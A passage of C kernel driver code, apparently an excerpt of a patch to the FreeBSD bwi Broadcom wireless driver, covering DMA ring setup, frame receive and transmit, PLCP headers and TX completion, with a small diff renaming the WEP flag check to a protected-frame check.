BUS_DMASYNC_PREWRITE); st->stats_idx = 0; stats_paddr = st->stats_paddr; for (i = 0; i < BWI_TXSTATS_NDESC; ++i) { bwi_setup_desc32(sc, st->stats_ring, BWI_TXSTATS_NDESC, i, stats_paddr, sizeof(struct bwi_txstats), 0); stats_paddr += sizeof(struct bwi_txstats); } bus_dmamap_sync(st->stats_ring_dtag, st->stats_ring_dmap, BUS_DMASYNC_PREWRITE); bwi_init_rxdesc_ring32(sc, st->stats_ctrl_base, st->stats_ring_paddr, 0, BWI_TXSTATS_NDESC); return 0; } static void bwi_setup_rx_desc32(struct bwi_softc *sc, int buf_idx, bus_addr_t paddr, int buf_len) { struct bwi_ring_data *rd = &sc->sc_rx_rdata; KASSERT(buf_idx < BWI_RX_NDESC, ("buf_idx %d", buf_idx)); bwi_setup_desc32(sc, rd->rdata_desc, BWI_RX_NDESC, buf_idx, paddr, buf_len, 0); } static void bwi_setup_tx_desc32(struct bwi_softc *sc, struct bwi_ring_data *rd, int buf_idx, bus_addr_t paddr, int buf_len) { KASSERT(buf_idx < BWI_TX_NDESC, ("buf_idx %d", buf_idx)); bwi_setup_desc32(sc, rd->rdata_desc, BWI_TX_NDESC, buf_idx, paddr, buf_len, 1); } static int bwi_init_tx_ring64(struct bwi_softc *sc, int ring_idx) { /* TODO:64 */ return EOPNOTSUPP; } static int bwi_init_rx_ring64(struct bwi_softc *sc) { /* TODO:64 */ return EOPNOTSUPP; } static int bwi_init_txstats64(struct bwi_softc *sc) { /* TODO:64 */ return EOPNOTSUPP; } static void bwi_setup_rx_desc64(struct bwi_softc *sc, int buf_idx, bus_addr_t paddr, int buf_len) { /* TODO:64 */ } static void bwi_setup_tx_desc64(struct bwi_softc *sc, struct bwi_ring_data *rd, int buf_idx, bus_addr_t paddr, int buf_len) { /* TODO:64 */ } static void bwi_dma_buf_addr(void *arg, bus_dma_segment_t *seg, int nseg, bus_size_t mapsz __unused, int error) { if (!error) { KASSERT(nseg == 1, ("too many segments(%d)\n", nseg)); *((bus_addr_t *)arg) = seg->ds_addr; } } static int bwi_newbuf(struct bwi_softc *sc, int buf_idx, int init) { struct bwi_rxbuf_data *rbd = &sc->sc_rx_bdata; struct bwi_rxbuf *rxbuf = &rbd->rbd_buf[buf_idx]; struct bwi_rxbuf_hdr *hdr; bus_dmamap_t map; bus_addr_t paddr; struct mbuf *m; int error; KASSERT(buf_idx < BWI_RX_NDESC, ("buf_idx %d", buf_idx)); m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { error = ENOBUFS; /* * If the NIC is up and running, we need to: * - Clear RX buffer's header. * - Restore RX descriptor settings. */ if (init) return error; else goto back; } m->m_len = m->m_pkthdr.len = MCLBYTES; /* * Try to load RX buf into temporary DMA map */ error = bus_dmamap_load_mbuf(sc->sc_buf_dtag, rbd->rbd_tmp_dmap, m, bwi_dma_buf_addr, &paddr, BUS_DMA_NOWAIT); if (error) { m_freem(m); /* * See the comment above */ if (init) return error; else goto back; } if (!init) bus_dmamap_unload(sc->sc_buf_dtag, rxbuf->rb_dmap); rxbuf->rb_mbuf = m; rxbuf->rb_paddr = paddr; /* * Swap RX buf's DMA map with the loaded temporary one */ map = rxbuf->rb_dmap; rxbuf->rb_dmap = rbd->rbd_tmp_dmap; rbd->rbd_tmp_dmap = map; back: /* * Clear RX buf header */ hdr = mtod(rxbuf->rb_mbuf, struct bwi_rxbuf_hdr *); bzero(hdr, sizeof(*hdr)); bus_dmamap_sync(sc->sc_buf_dtag, rxbuf->rb_dmap, BUS_DMASYNC_PREWRITE); /* * Setup RX buf descriptor */ sc->sc_setup_rxdesc(sc, buf_idx, rxbuf->rb_paddr, rxbuf->rb_mbuf->m_len - sizeof(*hdr)); return error; } static void bwi_set_addr_filter(struct bwi_softc *sc, uint16_t addr_ofs, const uint8_t *addr) { int i; CSR_WRITE_2(sc, BWI_ADDR_FILTER_CTRL, BWI_ADDR_FILTER_CTRL_SET | addr_ofs); for (i = 0; i < (IEEE80211_ADDR_LEN / 2); ++i) { uint16_t addr_val; addr_val = (uint16_t)addr[i * 2] | (((uint16_t)addr[(i * 2) + 1]) << 8); CSR_WRITE_2(sc, BWI_ADDR_FILTER_DATA, addr_val); } } static int bwi_rxeof(struct bwi_softc *sc, int end_idx) { struct bwi_ring_data *rd = &sc->sc_rx_rdata; struct bwi_rxbuf_data *rbd = &sc->sc_rx_bdata; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int idx, rx_data = 0; idx = rbd->rbd_idx; while (idx != end_idx) { struct bwi_rxbuf *rb = &rbd->rbd_buf[idx]; struct bwi_rxbuf_hdr *hdr; struct ieee80211_frame_min *wh; struct ieee80211_node *ni; struct mbuf *m; uint32_t plcp; uint16_t flags2; int buflen, wh_ofs, hdr_extra, rssi, noise, type, rate; m = rb->rb_mbuf; bus_dmamap_sync(sc->sc_buf_dtag, rb->rb_dmap, BUS_DMASYNC_POSTREAD); if (bwi_newbuf(sc, idx, 0)) { ifp->if_ierrors++; goto next; } hdr = mtod(m, struct bwi_rxbuf_hdr *); flags2 = le16toh(hdr->rxh_flags2); hdr_extra = 0; if (flags2 & BWI_RXH_F2_TYPE2FRAME) hdr_extra = 2; wh_ofs = hdr_extra + 6; /* XXX magic number */ buflen = le16toh(hdr->rxh_buflen); if (buflen < BWI_FRAME_MIN_LEN(wh_ofs)) { if_printf(ifp, "%s: zero length data, hdr_extra %d\n", __func__, hdr_extra); ifp->if_ierrors++; m_freem(m); goto next; } bcopy((uint8_t *)(hdr + 1) + hdr_extra, &plcp, sizeof(plcp)); rssi = bwi_calc_rssi(sc, hdr); noise = bwi_calc_noise(sc); m->m_pkthdr.rcvif = ifp; m->m_len = m->m_pkthdr.len = buflen + sizeof(*hdr); m_adj(m, sizeof(*hdr) + wh_ofs); if (htole16(hdr->rxh_flags1) & BWI_RXH_F1_OFDM) rate = bwi_plcp2rate(plcp, IEEE80211_T_OFDM); else rate = bwi_plcp2rate(plcp, IEEE80211_T_CCK); /* RX radio tap */ if (ieee80211_radiotap_active(ic)) bwi_rx_radiotap(sc, m, hdr, &plcp, rate, rssi, noise); m_adj(m, -IEEE80211_CRC_LEN); BWI_UNLOCK(sc); wh = mtod(m, struct ieee80211_frame_min *); ni = ieee80211_find_rxnode(ic, wh); if (ni != NULL) { type = ieee80211_input(ni, m, rssi - noise, noise); ieee80211_free_node(ni); } else type = ieee80211_input_all(ic, m, rssi - noise, noise); if (type == IEEE80211_FC0_TYPE_DATA) { rx_data = 1; sc->sc_rx_rate = rate; } BWI_LOCK(sc); next: idx = (idx + 1) % BWI_RX_NDESC; if (sc->sc_flags & BWI_F_STOP) { /* * Take the fast lane, don't do * any damage to softc */ return -1; } } rbd->rbd_idx = idx; bus_dmamap_sync(sc->sc_rxring_dtag, rd->rdata_dmap, BUS_DMASYNC_PREWRITE); return rx_data; } static int bwi_rxeof32(struct bwi_softc *sc) { uint32_t val, rx_ctrl; int end_idx, rx_data; rx_ctrl = sc->sc_rx_rdata.rdata_txrx_ctrl; val = CSR_READ_4(sc, rx_ctrl + BWI_RX32_STATUS); end_idx = __SHIFTOUT(val, BWI_RX32_STATUS_INDEX_MASK) / sizeof(struct bwi_desc32); rx_data = bwi_rxeof(sc, end_idx); if (rx_data >= 0) { CSR_WRITE_4(sc, rx_ctrl + BWI_RX32_INDEX, end_idx * sizeof(struct bwi_desc32)); } return rx_data; } static int bwi_rxeof64(struct bwi_softc *sc) { /* TODO:64 */ return 0; } static void bwi_reset_rx_ring32(struct bwi_softc *sc, uint32_t rx_ctrl) { int i; CSR_WRITE_4(sc, rx_ctrl + BWI_RX32_CTRL, 0); #define NRETRY 10 for (i = 0; i < NRETRY; ++i) { uint32_t status; status = CSR_READ_4(sc, rx_ctrl + BWI_RX32_STATUS); if (__SHIFTOUT(status, BWI_RX32_STATUS_STATE_MASK) == BWI_RX32_STATUS_STATE_DISABLED) break; DELAY(1000); } if (i == NRETRY) device_printf(sc->sc_dev, "reset rx ring timedout\n"); #undef NRETRY CSR_WRITE_4(sc, rx_ctrl + BWI_RX32_RINGINFO, 0); } static void bwi_free_txstats32(struct bwi_softc *sc) { bwi_reset_rx_ring32(sc, sc->sc_txstats->stats_ctrl_base); } static void bwi_free_rx_ring32(struct bwi_softc *sc) { struct bwi_ring_data *rd = &sc->sc_rx_rdata; struct bwi_rxbuf_data *rbd = &sc->sc_rx_bdata; int i; bwi_reset_rx_ring32(sc, rd->rdata_txrx_ctrl); for (i = 0; i < BWI_RX_NDESC; ++i) { struct bwi_rxbuf *rb = &rbd->rbd_buf[i]; if (rb->rb_mbuf != NULL) { bus_dmamap_unload(sc->sc_buf_dtag, rb->rb_dmap); m_freem(rb->rb_mbuf); rb->rb_mbuf = NULL; } } } static void bwi_free_tx_ring32(struct bwi_softc *sc, int ring_idx) { struct bwi_ring_data *rd; struct bwi_txbuf_data *tbd; struct ifnet *ifp = sc->sc_ifp; uint32_t state, val; int i; KASSERT(ring_idx < BWI_TX_NRING, ("ring_idx %d", ring_idx)); rd = &sc->sc_tx_rdata[ring_idx]; tbd = &sc->sc_tx_bdata[ring_idx]; #define NRETRY 10 for (i = 0; i < NRETRY; ++i) { val = CSR_READ_4(sc, rd->rdata_txrx_ctrl + BWI_TX32_STATUS); state = __SHIFTOUT(val, BWI_TX32_STATUS_STATE_MASK); if (state == BWI_TX32_STATUS_STATE_DISABLED || state == BWI_TX32_STATUS_STATE_IDLE || state == BWI_TX32_STATUS_STATE_STOPPED) break; DELAY(1000); } if (i == NRETRY) { if_printf(ifp, "%s: wait for TX ring(%d) stable timed out\n", __func__, ring_idx); } CSR_WRITE_4(sc, rd->rdata_txrx_ctrl + BWI_TX32_CTRL, 0); for (i = 0; i < NRETRY; ++i) { val = CSR_READ_4(sc, rd->rdata_txrx_ctrl + BWI_TX32_STATUS); state = __SHIFTOUT(val, BWI_TX32_STATUS_STATE_MASK); if (state == BWI_TX32_STATUS_STATE_DISABLED) break; DELAY(1000); } if (i == NRETRY) if_printf(ifp, "%s: reset TX ring (%d) timed out\n", __func__, ring_idx); #undef NRETRY DELAY(1000); CSR_WRITE_4(sc, rd->rdata_txrx_ctrl + BWI_TX32_RINGINFO, 0); for (i = 0; i < BWI_TX_NDESC; ++i) { struct bwi_txbuf *tb = &tbd->tbd_buf[i]; if (tb->tb_mbuf != NULL) { bus_dmamap_unload(sc->sc_buf_dtag, tb->tb_dmap); m_freem(tb->tb_mbuf); tb->tb_mbuf = NULL; } if (tb->tb_ni != NULL) { ieee80211_free_node(tb->tb_ni); tb->tb_ni = NULL; } } } static void bwi_free_txstats64(struct bwi_softc *sc) { /* TODO:64 */ } static void bwi_free_rx_ring64(struct bwi_softc *sc) { /* TODO:64 */ } static void bwi_free_tx_ring64(struct bwi_softc *sc, int ring_idx) { /* TODO:64 */ } /* XXX does not belong here */ #define IEEE80211_OFDM_PLCP_RATE_MASK __BITS(3, 0) #define IEEE80211_OFDM_PLCP_LEN_MASK __BITS(16, 5) static __inline void bwi_ofdm_plcp_header(uint32_t *plcp0, int pkt_len, uint8_t rate) { uint32_t plcp; plcp = __SHIFTIN(ieee80211_rate2plcp(rate, IEEE80211_T_OFDM), IEEE80211_OFDM_PLCP_RATE_MASK) | __SHIFTIN(pkt_len, IEEE80211_OFDM_PLCP_LEN_MASK); *plcp0 = htole32(plcp); } static __inline void bwi_ds_plcp_header(struct ieee80211_ds_plcp_hdr *plcp, int pkt_len, uint8_t rate) { int len, service, pkt_bitlen; pkt_bitlen = pkt_len * NBBY; len = howmany(pkt_bitlen * 2, rate); service = IEEE80211_PLCP_SERVICE_LOCKED; if (rate == (11 * 2)) { int pkt_bitlen1; /* * PLCP service field needs to be adjusted, * if TX rate is 11Mbytes/s */ pkt_bitlen1 = len * 11; if (pkt_bitlen1 - pkt_bitlen >= NBBY) service |= IEEE80211_PLCP_SERVICE_LENEXT7; } plcp->i_signal = ieee80211_rate2plcp(rate, IEEE80211_T_CCK); plcp->i_service = service; plcp->i_length = htole16(len); /* NOTE: do NOT touch i_crc */ } static __inline void bwi_plcp_header(const struct ieee80211_rate_table *rt, void *plcp, int pkt_len, uint8_t rate) { enum ieee80211_phytype modtype; /* * Assume caller has zeroed 'plcp' */ modtype = ieee80211_rate2phytype(rt, rate); if (modtype == IEEE80211_T_OFDM) bwi_ofdm_plcp_header(plcp, pkt_len, rate); else if (modtype == IEEE80211_T_DS) bwi_ds_plcp_header(plcp, pkt_len, rate); else panic("unsupport modulation type %u\n", modtype); } static int bwi_encap(struct bwi_softc *sc, int idx, struct mbuf *m, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct bwi_ring_data *rd = &sc->sc_tx_rdata[BWI_TX_DATA_RING]; struct bwi_txbuf_data *tbd = &sc->sc_tx_bdata[BWI_TX_DATA_RING]; struct bwi_txbuf *tb = &tbd->tbd_buf[idx]; struct bwi_mac *mac; struct bwi_txbuf_hdr *hdr; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; uint8_t rate, rate_fb; uint32_t mac_ctrl; uint16_t phy_ctrl; bus_addr_t paddr; int type, ismcast, pkt_len, error, rix; #if 0 const uint8_t *p; int i; #endif KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; wh = mtod(m, struct ieee80211_frame *); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); /* Get 802.11 frame len before prepending TX header */ pkt_len = m->m_pkthdr.len + IEEE80211_CRC_LEN; /* * Find TX rate */ tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (type != IEEE80211_FC0_TYPE_DATA || (m->m_flags & M_EAPOL)) { rate = rate_fb = tp->mgmtrate; } else if (ismcast) { rate = rate_fb = tp->mcastrate; } else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { rate = rate_fb = tp->ucastrate; } else { rix = ieee80211_ratectl_rate(ni, NULL, pkt_len); rate = ni->ni_txrate; if (rix > 0) { rate_fb = ni->ni_rates.rs_rates[rix-1] & IEEE80211_RATE_VAL; } else { rate_fb = rate; } } tb->tb_rate[0] = rate; tb->tb_rate[1] = rate_fb; sc->sc_tx_rate = rate; /* * TX radio tap */ if (ieee80211_radiotap_active_vap(vap)) { sc->sc_tx_th.wt_flags = 0; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP; if (ieee80211_rate2phytype(sc->sc_rates, rate) == IEEE80211_T_DS && (ic->ic_flags & IEEE80211_F_SHPREAMBLE) && rate != (1 * 2)) { sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; } sc->sc_tx_th.wt_rate = rate; ieee80211_radiotap_tx(vap, m); } /* * Setup the embedded TX header */ M_PREPEND(m, sizeof(*hdr), M_NOWAIT); if (m == NULL) { if_printf(ifp, "%s: prepend TX header failed\n", __func__); return ENOBUFS; } hdr = mtod(m, struct bwi_txbuf_hdr *); bzero(hdr, sizeof(*hdr)); bcopy(wh->i_fc, hdr->txh_fc, sizeof(hdr->txh_fc)); bcopy(wh->i_addr1, hdr->txh_addr1, sizeof(hdr->txh_addr1)); if (!ismcast) { uint16_t dur; dur = ieee80211_ack_duration(sc->sc_rates, rate, ic->ic_flags & ~IEEE80211_F_SHPREAMBLE); hdr->txh_fb_duration = htole16(dur); } hdr->txh_id = __SHIFTIN(BWI_TX_DATA_RING, BWI_TXH_ID_RING_MASK) | __SHIFTIN(idx, BWI_TXH_ID_IDX_MASK); bwi_plcp_header(sc->sc_rates, hdr->txh_plcp, pkt_len, rate); bwi_plcp_header(sc->sc_rates, hdr->txh_fb_plcp, pkt_len, rate_fb); phy_ctrl = __SHIFTIN(mac->mac_rf.rf_ant_mode, BWI_TXH_PHY_C_ANTMODE_MASK); if (ieee80211_rate2phytype(sc->sc_rates, rate) == IEEE80211_T_OFDM) phy_ctrl |= BWI_TXH_PHY_C_OFDM; else if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && rate != (2 * 1)) phy_ctrl |= BWI_TXH_PHY_C_SHPREAMBLE; mac_ctrl = BWI_TXH_MAC_C_HWSEQ | BWI_TXH_MAC_C_FIRST_FRAG; if (!ismcast) mac_ctrl |= BWI_TXH_MAC_C_ACK; if (ieee80211_rate2phytype(sc->sc_rates, rate_fb) == IEEE80211_T_OFDM) mac_ctrl |= BWI_TXH_MAC_C_FB_OFDM; hdr->txh_mac_ctrl = htole32(mac_ctrl); hdr->txh_phy_ctrl = htole16(phy_ctrl); /* Catch any further usage */ hdr = NULL; wh = NULL; /* DMA load */ error = bus_dmamap_load_mbuf(sc->sc_buf_dtag, tb->tb_dmap, m, bwi_dma_buf_addr, &paddr, BUS_DMA_NOWAIT); if (error && error != EFBIG) { if_printf(ifp, "%s: can't load TX buffer (1) %d\n", __func__, error); goto back; } if (error) { /* error == EFBIG */ struct mbuf *m_new; m_new = m_defrag(m, M_NOWAIT); if (m_new == NULL) { if_printf(ifp, "%s: can't defrag TX buffer\n", __func__); error = ENOBUFS; goto back; } else { m = m_new; } error = bus_dmamap_load_mbuf(sc->sc_buf_dtag, tb->tb_dmap, m, bwi_dma_buf_addr, &paddr, BUS_DMA_NOWAIT); if (error) { if_printf(ifp, "%s: can't load TX buffer (2) %d\n", __func__, error); goto back; } } error = 0; bus_dmamap_sync(sc->sc_buf_dtag, tb->tb_dmap, BUS_DMASYNC_PREWRITE); tb->tb_mbuf = m; tb->tb_ni = ni; #if 0 p = mtod(m, const uint8_t *); for (i = 0; i < m->m_pkthdr.len; ++i) { if (i != 0 && i % 8 == 0) printf("\n"); printf("%02x ", p[i]); } printf("\n"); #endif DPRINTF(sc, BWI_DBG_TX, "idx %d, pkt_len %d, buflen %d\n", idx, pkt_len, m->m_pkthdr.len); /* Setup TX descriptor */ sc->sc_setup_txdesc(sc, rd, idx, paddr, m->m_pkthdr.len); bus_dmamap_sync(sc->sc_txring_dtag, rd->rdata_dmap, BUS_DMASYNC_PREWRITE); /* Kick start */ sc->sc_start_tx(sc, rd->rdata_txrx_ctrl, idx); back: if (error) m_freem(m); return error; } static int bwi_encap_raw(struct bwi_softc *sc, int idx, struct mbuf *m, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct bwi_ring_data *rd = &sc->sc_tx_rdata[BWI_TX_DATA_RING]; struct bwi_txbuf_data *tbd = &sc->sc_tx_bdata[BWI_TX_DATA_RING]; struct bwi_txbuf *tb = &tbd->tbd_buf[idx]; struct bwi_mac *mac; struct bwi_txbuf_hdr *hdr; struct ieee80211_frame *wh; uint8_t rate, rate_fb; uint32_t mac_ctrl; uint16_t phy_ctrl; bus_addr_t paddr; int ismcast, pkt_len, error; KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; wh = mtod(m, struct ieee80211_frame *); ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); /* Get 802.11 frame len before prepending TX header */ pkt_len = m->m_pkthdr.len + IEEE80211_CRC_LEN; /* * Find TX rate */ rate = params->ibp_rate0; if (!ieee80211_isratevalid(ic->ic_rt, rate)) { /* XXX fall back to mcast/mgmt rate? */ m_freem(m); return EINVAL; } if (params->ibp_try1 != 0) { rate_fb = params->ibp_rate1; if (!ieee80211_isratevalid(ic->ic_rt, rate_fb)) { /* XXX fall back to rate0? */ m_freem(m); return EINVAL; } } else rate_fb = rate; tb->tb_rate[0] = rate; tb->tb_rate[1] = rate_fb; sc->sc_tx_rate = rate; /* * TX radio tap */ if (ieee80211_radiotap_active_vap(vap)) { sc->sc_tx_th.wt_flags = 0; /* XXX IEEE80211_BPF_CRYPTO */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP; if (params->ibp_flags & IEEE80211_BPF_SHORTPRE) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; sc->sc_tx_th.wt_rate = rate; ieee80211_radiotap_tx(vap, m); } /* * Setup the embedded TX header */ M_PREPEND(m, sizeof(*hdr), M_NOWAIT); if (m == NULL) { if_printf(ifp, "%s: prepend TX header failed\n", __func__); return ENOBUFS; } hdr = mtod(m, struct bwi_txbuf_hdr *); bzero(hdr, sizeof(*hdr)); bcopy(wh->i_fc, hdr->txh_fc, sizeof(hdr->txh_fc)); bcopy(wh->i_addr1, hdr->txh_addr1, sizeof(hdr->txh_addr1)); mac_ctrl = BWI_TXH_MAC_C_HWSEQ | BWI_TXH_MAC_C_FIRST_FRAG; if (!ismcast && (params->ibp_flags & IEEE80211_BPF_NOACK) == 0) { uint16_t dur; dur = ieee80211_ack_duration(sc->sc_rates, rate_fb, 0); hdr->txh_fb_duration = htole16(dur); mac_ctrl |= BWI_TXH_MAC_C_ACK; } hdr->txh_id = __SHIFTIN(BWI_TX_DATA_RING, BWI_TXH_ID_RING_MASK) | __SHIFTIN(idx, BWI_TXH_ID_IDX_MASK); bwi_plcp_header(sc->sc_rates, hdr->txh_plcp, pkt_len, rate); bwi_plcp_header(sc->sc_rates, hdr->txh_fb_plcp, pkt_len, rate_fb); phy_ctrl = __SHIFTIN(mac->mac_rf.rf_ant_mode, BWI_TXH_PHY_C_ANTMODE_MASK); if (ieee80211_rate2phytype(sc->sc_rates, rate) == IEEE80211_T_OFDM) { phy_ctrl |= BWI_TXH_PHY_C_OFDM; mac_ctrl |= BWI_TXH_MAC_C_FB_OFDM; } else if (params->ibp_flags & IEEE80211_BPF_SHORTPRE) phy_ctrl |= BWI_TXH_PHY_C_SHPREAMBLE; hdr->txh_mac_ctrl = htole32(mac_ctrl); hdr->txh_phy_ctrl = htole16(phy_ctrl); /* Catch any further usage */ hdr = NULL; wh = NULL; /* DMA load */ error = bus_dmamap_load_mbuf(sc->sc_buf_dtag, tb->tb_dmap, m, bwi_dma_buf_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0) { struct mbuf *m_new; if (error != EFBIG) { if_printf(ifp, "%s: can't load TX buffer (1) %d\n", __func__, error); goto back; } m_new = m_defrag(m, M_NOWAIT); if (m_new == NULL) { if_printf(ifp, "%s: can't defrag TX buffer\n", __func__); error = ENOBUFS; goto back; } m = m_new; error = bus_dmamap_load_mbuf(sc->sc_buf_dtag, tb->tb_dmap, m, bwi_dma_buf_addr, &paddr, BUS_DMA_NOWAIT); if (error) { if_printf(ifp, "%s: can't load TX buffer (2) %d\n", __func__, error); goto back; } } bus_dmamap_sync(sc->sc_buf_dtag, tb->tb_dmap, BUS_DMASYNC_PREWRITE); tb->tb_mbuf = m; tb->tb_ni = ni; DPRINTF(sc, BWI_DBG_TX, "idx %d, pkt_len %d, buflen %d\n", idx, pkt_len, m->m_pkthdr.len); /* Setup TX descriptor */ sc->sc_setup_txdesc(sc, rd, idx, paddr, m->m_pkthdr.len); bus_dmamap_sync(sc->sc_txring_dtag, rd->rdata_dmap, BUS_DMASYNC_PREWRITE); /* Kick start */ sc->sc_start_tx(sc, rd->rdata_txrx_ctrl, idx); back: if (error) m_freem(m); return error; } static void bwi_start_tx32(struct bwi_softc *sc, uint32_t tx_ctrl, int idx) { idx = (idx + 1) % BWI_TX_NDESC; CSR_WRITE_4(sc, tx_ctrl + BWI_TX32_INDEX, idx * sizeof(struct bwi_desc32)); } static void bwi_start_tx64(struct bwi_softc *sc, uint32_t tx_ctrl, int idx) { /* TODO:64 */ } static void bwi_txeof_status32(struct bwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t val, ctrl_base; int end_idx; ctrl_base = sc->sc_txstats->stats_ctrl_base; val = CSR_READ_4(sc, ctrl_base + BWI_RX32_STATUS); end_idx = __SHIFTOUT(val, BWI_RX32_STATUS_INDEX_MASK) / sizeof(struct bwi_desc32); bwi_txeof_status(sc, end_idx); CSR_WRITE_4(sc, ctrl_base + BWI_RX32_INDEX, end_idx * sizeof(struct bwi_desc32)); if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0) ifp->if_start(ifp); } static void bwi_txeof_status64(struct bwi_softc *sc) { /* TODO:64 */ } static void _bwi_txeof(struct bwi_softc *sc, uint16_t tx_id, int acked, int data_txcnt) { struct ifnet *ifp = sc->sc_ifp; struct bwi_txbuf_data *tbd; struct bwi_txbuf *tb; int ring_idx, buf_idx; struct ieee80211_node *ni; struct ieee80211vap *vap; if (tx_id == 0) { if_printf(ifp, "%s: zero tx id\n", __func__); return; } ring_idx = __SHIFTOUT(tx_id, BWI_TXH_ID_RING_MASK); buf_idx = __SHIFTOUT(tx_id, BWI_TXH_ID_IDX_MASK); KASSERT(ring_idx == BWI_TX_DATA_RING, ("ring_idx %d", ring_idx)); KASSERT(buf_idx < BWI_TX_NDESC, ("buf_idx %d", buf_idx)); tbd = &sc->sc_tx_bdata[ring_idx]; KASSERT(tbd->tbd_used > 0, ("tbd_used %d", tbd->tbd_used)); tbd->tbd_used--; tb = &tbd->tbd_buf[buf_idx]; DPRINTF(sc, BWI_DBG_TXEOF, "txeof idx %d, " "acked %d, data_txcnt %d, ni %p\n", buf_idx, acked, data_txcnt, tb->tb_ni); bus_dmamap_unload(sc->sc_buf_dtag, tb->tb_dmap); ni = tb->tb_ni; if (tb->tb_ni != NULL) { const struct bwi_txbuf_hdr *hdr = mtod(tb->tb_mbuf, const struct bwi_txbuf_hdr *); vap = ni->ni_vap; /* NB: update rate control only for unicast frames */ if (hdr->txh_mac_ctrl & htole32(BWI_TXH_MAC_C_ACK)) { /* * Feed back 'acked and data_txcnt'. Note that the * generic AMRR code only understands one tx rate * and the estimator doesn't handle real retry counts * well so to avoid over-aggressive downshifting we * treat any number of retries as "1". */ ieee80211_ratectl_tx_complete(vap, ni, (data_txcnt > 1) ? IEEE80211_RATECTL_TX_SUCCESS : IEEE80211_RATECTL_TX_FAILURE, &acked, NULL); } /* * Do any tx complete callback. Note this must * be done before releasing the node reference. */ if (tb->tb_mbuf->m_flags & M_TXCB) ieee80211_process_callback(ni, tb->tb_mbuf, !acked); ieee80211_free_node(tb->tb_ni); tb->tb_ni = NULL; } m_freem(tb->tb_mbuf); tb->tb_mbuf = NULL; if (tbd->tbd_used == 0) sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; } static void bwi_txeof_status(struct bwi_softc *sc, int end_idx) { struct bwi_txstats_data *st = sc->sc_txstats; int idx; bus_dmamap_sync(st->stats_dtag, st->stats_dmap, BUS_DMASYNC_POSTREAD); idx = st->stats_idx; while (idx != end_idx) { const struct bwi_txstats *stats = &st->stats[idx]; if ((stats->txs_flags & BWI_TXS_F_PENDING) == 0) { int data_txcnt; data_txcnt = __SHIFTOUT(stats->txs_txcnt, BWI_TXS_TXCNT_DATA); _bwi_txeof(sc, le16toh(stats->txs_id), stats->txs_flags & BWI_TXS_F_ACKED, data_txcnt); } idx = (idx + 1) % BWI_TXSTATS_NDESC; } st->stats_idx = idx; } static void bwi_txeof(struct bwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; for (;;) { uint32_t tx_status0, tx_status1; uint16_t tx_id; int data_txcnt; tx_status0 = CSR_READ_4(sc, BWI_TXSTATUS0); if ((tx_status0 & BWI_TXSTATUS0_VALID) == 0) break; tx_status1 = CSR_READ_4(sc, BWI_TXSTATUS1); tx_id = __SHIFTOUT(tx_status0, BWI_TXSTATUS0_TXID_MASK); data_txcnt = __SHIFTOUT(tx_status0, BWI_TXSTATUS0_DATA_TXCNT_MASK); if (tx_status0 & (BWI_TXSTATUS0_AMPDU | BWI_TXSTATUS0_PENDING)) continue; _bwi_txeof(sc, le16toh(tx_id), tx_status0 & BWI_TXSTATUS0_ACKED, data_txcnt); } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0) ifp->if_start(ifp); } static int bwi_bbp_power_on(struct bwi_softc *sc, enum bwi_clock_mode clk_mode) { bwi_power_on(sc, 1); return bwi_set_clock_mode(sc, clk_mode); } static void bwi_bbp_power_off(struct bwi_softc *sc) { bwi_set_clock_mode(sc, BWI_CLOCK_MODE_SLOW); bwi_power_off(sc, 1); } static int bwi_get_pwron_delay(struct bwi_softc *sc) { struct bwi_regwin *com, *old; struct bwi_clock_freq freq; uint32_t val; int error; com = &sc->sc_com_regwin; KASSERT(BWI_REGWIN_EXIST(com), ("no regwin")); if ((sc->sc_cap & BWI_CAP_CLKMODE) == 0) return 0; error = bwi_regwin_switch(sc, com, &old); if (error) return error; bwi_get_clock_freq(sc, &freq); val = CSR_READ_4(sc, BWI_PLL_ON_DELAY); sc->sc_pwron_delay = howmany((val + 2) * 1000000, freq.clkfreq_min); DPRINTF(sc, BWI_DBG_ATTACH, "power on delay %u\n", sc->sc_pwron_delay); return bwi_regwin_switch(sc, old, NULL); } static int bwi_bus_attach(struct bwi_softc *sc) { struct bwi_regwin *bus, *old; int error; bus = &sc->sc_bus_regwin; error = bwi_regwin_switch(sc, bus, &old); if (error) return error; if (!bwi_regwin_is_enabled(sc, bus)) bwi_regwin_enable(sc, bus, 0); /* Disable interripts */ CSR_WRITE_4(sc, BWI_INTRVEC, 0); return bwi_regwin_switch(sc, old, NULL); } static const 